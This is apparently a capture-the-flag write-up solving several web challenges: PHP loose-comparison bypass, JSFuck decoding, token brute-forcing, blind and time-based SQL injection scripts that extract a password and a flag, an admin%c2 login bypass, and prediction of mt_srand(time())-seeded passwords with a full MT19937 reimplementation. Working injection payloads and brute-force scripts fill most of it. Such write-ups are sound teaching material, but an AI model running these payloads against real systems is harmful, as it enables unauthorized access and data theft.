Sign-in challenge
Straightforward source-code audit: PHP weak typing.
Then for the second stage, construct:
<?php
// serialize an object whose key is the integer 0; the server's loose (==) comparison does the rest
class a{
var $key;
}
$b = new a();
$b->key=0;
$c=json_encode($b);
echo $c; // {"key":0}
?>
Lucky draw (抽抽奖)
hahaha
No data is sent to the server, so the logic must run client-side. Then found JSFuck in the JQuery.js file; decode it and just type getFlag in the console.
Keep drawing (继续抽)
Just brute-force it; script below
import hashlib
import requests

def encode(s):
    # transform each character of the md5 hex digest into the form get.php expects
    end = ""
    for ch in s:
        if ord(ch) < 128:
            end += "%x" % (255 - (ord(ch) + 128))
        elif ord(ch) > 127:
            end += "%x" % (255 - (ord(ch) - 128))
    return end

flag = []
cookies = {'PHPSESSID': '3k2rd4536me3rjsojf473vctd7'}
for x in range(0, 200):
    # fetch a fresh token for every attempt, then request the id derived from md5(x)
    r = requests.get("http://117.34.111.15:81/token.php", cookies=cookies)
    token = r.text[1:-1]          # drop the first and last characters wrapping the token
    m = hashlib.md5(str(x).encode()).hexdigest()
    url = "http://117.34.111.15:81/get.php?token=" + token + "&id=" + encode(m)
    print(x)
    print(url)
    s = requests.get(url, cookies=cookies)
    flag.append(s.text)
    print(s.text)
print(set(flag))
So easy
Code audit shows:
escape_string is not used here, so there is an injection.
But it took a lot of fiddling.
function show($username){
global $conn;
// $username is concatenated into the query unescaped: SQL injection
$sql = "select role from `user` where username ='".$username."'";
$res = $conn ->query($sql);
if($res->num_rows>0){
echo "$username is ".$res->fetch_assoc()['role'];
}else{
die("Don't have this user!");
}
}
Then, following the filter function, I found a writeup by sysclover from last year.
Only then did I realize I'd run into this operator-based injection construction a while back, but I was busy at the time and had no time to do it, so the skill point never got unlocked.
The script looks like this; ugly, but it dumps passwd.
# -*-coding:utf-8-*-
import requests

url = "http://117.34.111.15:89/?action=show"
passwd = ""
lists = "1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm"
for i in range(1, 33):
    print(i)
    for p in lists:
        # becomes: username='-1'=(ascii(mid((passwd)from(i)))=ord(p))='0'
        # MySQL evaluates '=' left to right, so the row matches exactly when the
        # guessed character is right and "admin" appears in the response
        param = {'username': "-1'=(ascii(mid((passwd)from(" + str(i) + ")))=" + str(ord(p)) + ")='0"}
        content = requests.post(url, data=param).text   # one request per guess
        print(content)
        if "admin" in content:
            passwd = passwd + p
            break
print(passwd)
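Why "admin" shows up exactly when the guessed character is right: as an added example (not code from the original writeup), the following Python models MySQL's left-associative `=` with its string-to-number conversion, runs the vulnerable show() query over a constructed user table, and drives the same charset loop against that model so the oracle can be checked offline. The rows, the passwd/role columns and the "admin" role value are constructed assumptions; the comparison model is simplified to the cases the payload exercises.

```python
# Added example, not from the original writeup. Models MySQL's chained
# comparison  username = '-1' = (cond) = '0'  and the boolean oracle built on it.

USERS = [  # constructed sample rows (assumed table layout: username/role/passwd)
    {"username": "admin", "role": "admin", "passwd": "s3cretP4ss"},
    {"username": "guest", "role": "guest", "passwd": "guest"},
]

CHARSET = "1234567890QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm"


def mysql_eq(a, b):
    """Simplified MySQL '=': two strings compare as (case-insensitive) strings;
    otherwise strings are converted to numbers (non-numeric -> 0). Returns 0/1."""
    if isinstance(a, str) and isinstance(b, str):
        return int(a.lower() == b.lower())

    def num(x):
        if isinstance(x, str):
            try:
                return float(x)
            except ValueError:
                return 0.0
        return float(x)

    return int(num(a) == num(b))


def where_clause(row, pos, guess):
    """Evaluate, for one row, the WHERE clause the payload produces:
         username = '-1' = (ascii(mid(passwd from pos)) = guess) = '0'
    '=' is left-associative, so this is  ((username = '-1') = cond) = '0'.
    username = '-1' is 0 for every row, hence the row matches iff cond is 1."""
    sub = row["passwd"][pos - 1:]                       # mid(passwd from pos)
    cond = int((ord(sub[0]) if sub else 0) == guess)    # ascii('') is 0
    return mysql_eq(mysql_eq(mysql_eq(row["username"], "-1"), cond), "0")


def show(pos, guess):
    """Model of the vulnerable show(): echoes the injected username plus the
    role of the first matching row, or the 'no such user' message."""
    injected = f"-1'=(ascii(mid((passwd)from({pos})))={guess})='0"
    for row in USERS:
        if where_clause(row, pos, guess):
            return f"{injected} is {row['role']}"
    return "Don't have this user!"


def extract_passwd(max_len=32):
    """Same loop as the writeup's script, run against the model instead of the server."""
    passwd = ""
    for i in range(1, max_len + 1):
        for p in CHARSET:
            if "admin" in show(i, ord(p)):
                passwd += p
                break
        else:
            break   # nothing matched: end of string (or a character outside CHARSET)
    return passwd


if __name__ == "__main__":
    print(extract_passwd())
```

Note that the oracle reads the role of the first row whose condition holds, so a second user whose password shares a character at the same position can also produce a match; checking for the exact role string ("admin") rather than just "a row came back" is what keeps the extraction on the admin row.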
Log in and you get the flag.
For the admin check at login, just use admin%c2 to bypass it; I'd read master ph's recent article a while ago, so I recognized it quickly.
Wrong
Found a .swp file right away
<?php
error_reporting(0);
function create_password($pw_length = 10)
{
    $randpwd = "";
    for ($i = 0; $i < $pw_length; $i++)
    {
        $randpwd .= chr(mt_rand(33, 126));
    }
    return $randpwd;
}

session_start();
mt_srand(time());
$pwd=create_password();

if($pwd==$_GET['pwd'])
{
    if($_SESSION['userLogin']==$_GET['login'])
        echo "Good job, you get the key";
}
else
{echo "Wrong!";}
At first I handed it to a teammate, who ground on it for ages and still couldn't crack it.
I took a look; the idea is roughly as follows.
$pwd==$_GET['pwd']
$_SESSION['userLogin']==$_GET['login']
Two checks. The session check is satisfied by clearing the cookie: a fresh session has no userLogin, and with no login parameter in the request both sides are NULL, so NULL==NULL holds.
The pwd check requires generating pwd locally ahead of time: mt_srand(time()) seeds the generator with the server's clock, so the password is fully determined by the timestamp.
pwd generation script (note: set the Linux clock to the server's time, and probably change the timezone too; my first attempt without changing the timezone didn't pass anyway)
<?php
function create_password($pw_length = 10)
{
    $randpwd = "";
    for($i=0;$i<$pw_length;$i++)
    {
        $randpwd.=chr(mt_rand(33,126));
    }
    return $randpwd;
}
echo date("Y-m-d h:i:sa")."\n";
mt_srand(time());
$pwd=create_password();
echo $pwd;
?>
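As an added example that is not part of the original writeup: the same generator reimplemented in Python, so candidate passwords can be computed for a window of server timestamps instead of changing the local clock. It assumes the target runs PHP 7.1 or later in the default MT_RAND_MT19937 mode, where mt_srand() seeds a standard MT19937, the no-argument mt_rand() returns the 32-bit output shifted right by one, and mt_rand(min, max) reduces the 32-bit output with the rejection-sampling step reproduced below; PHP 7.0 and earlier used a different range scaling and a non-standard twist, so their values would not match. The base URL and the clock-skew window are assumptions.

```python
# Added example, not from the original writeup: PHP 7.1+ mt_srand()/mt_rand()
# reimplemented so that create_password() can be evaluated for any timestamp.
import time
from urllib.parse import quote


class PhpMt19937:
    """MT19937 seeded the way php_mt_initialize() does (init_genrand)."""

    def __init__(self, seed):
        self.mt = [0] * 624
        self.mt[0] = seed & 0xFFFFFFFF
        for i in range(1, 624):
            prev = self.mt[i - 1]
            self.mt[i] = (1812433253 * (prev ^ (prev >> 30)) + i) & 0xFFFFFFFF
        self.index = 624                      # force a twist on first use

    def _twist(self):
        mt = self.mt
        for i in range(624):
            y = (mt[i] & 0x80000000) | (mt[(i + 1) % 624] & 0x7FFFFFFF)
            mt[i] = mt[(i + 397) % 624] ^ (y >> 1) ^ (0x9908B0DF if y & 1 else 0)
        self.index = 0

    def raw32(self):
        """php_mt_rand(): one tempered 32-bit output."""
        if self.index >= 624:
            self._twist()
        y = self.mt[self.index]
        self.index += 1
        y ^= y >> 11
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        return y & 0xFFFFFFFF

    def mt_rand(self, lo=None, hi=None):
        """PHP 7.1+ mt_rand() and mt_rand(min, max) (assumed semantics, see lead-in)."""
        if lo is None:
            return self.raw32() >> 1
        umax = hi - lo
        result = self.raw32()
        if umax == 0xFFFFFFFF:                # full range: no reduction needed
            return lo + result
        umax += 1
        if umax & (umax - 1) == 0:            # power of two: mask, no bias
            return lo + (result & (umax - 1))
        limit = 0xFFFFFFFF - (0xFFFFFFFF % umax) - 1
        while result > limit:                 # reject to avoid modulo bias
            result = self.raw32()
        return lo + result % umax


def create_password(seed, pw_length=10):
    """The leaked create_password() loop, after mt_srand(seed)."""
    rng = PhpMt19937(seed)
    return "".join(chr(rng.mt_rand(33, 126)) for _ in range(pw_length))


def candidate_urls(base, server_time=None, skew=5):
    """One ?pwd=... URL per second in [server_time - skew, server_time + skew].
    No 'login' parameter is sent: with a fresh session (no PHPSESSID cookie)
    $_SESSION['userLogin'] and $_GET['login'] are both null.  The password is
    drawn from chr(33..126), so it may contain &, #, % or +: URL-encode it."""
    t = int(time.time()) if server_time is None else server_time
    return [f"{base}?pwd={quote(create_password(s), safe='')}"
            for s in range(t - skew, t + skew + 1)]


if __name__ == "__main__":
    for url in candidate_urls("http://example.invalid/index.php", skew=3):  # assumed base URL
        print(url)
```

Send each candidate without a session cookie; only the one whose second matches the server's time() returns "Good job". Requesting a few seconds on either side of the local clock absorbs the network delay and any small clock skew, which is what the timezone fiddling in the note above was compensating for.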
just a test
Someone, somewhere, stuck in a popup that gave the impression of XSS; I hammered at it all noon and found nothing. Despair!
Later a teammate suggested it might be injection; I tried it in the URL and it really was injection??? Excuse me???
Script first:
# -*- coding:utf-8 -*-
import requests
import time

flag = ""
for j in range(1, 50):
    for i in range(33, 127):
        # the table name fl@g contains an '@', so it has to be wrapped in backticks
        url = ("http://117.34.111.15:83/chandni-jewel'%20union%20select%20if((select%20ascii(substr(f1ag,"
               + str(j) + ",1))%20from%20test.`fl@g`%20limit%200,1)=" + str(i) + ",sleep(0.4),1)%2523")
        a = time.time()
        requests.get(url)
        # print(time.time() - a)
        print('.', end='', flush=True)
        if time.time() - a > 4:          # slow response: the guessed byte is right
            print(chr(i))
            flag = flag + chr(i)         # append the matched character
            break
print(flag)
# database() 5
# database() test
# table1 fl@g
# column f1ag
# http://117.34.111.15:83/chandni-jewel' union select if((select ascii(substr(f1ag," str(j) ",1)) from test.fl@g limit 0,1)=" str(i) ",sleep(0.4),1)%23
# http://117.34.111.15:83/chandni-jewel'%20union%20select%20if((select%20length(column_name)%20from%20information_schema.columns%20limit 1,1)="+str(i)+",sleep(0.4),1)%2523
Started brute-forcing the flag but it never came out; despair again.
Questioning my life, I pasted the payload into Burp, it returned an error, and only then did I notice the table name contains an @; wrapping it in backticks in the payload fixes it.
The server wasn't very responsive; it took many runs to get the flag out.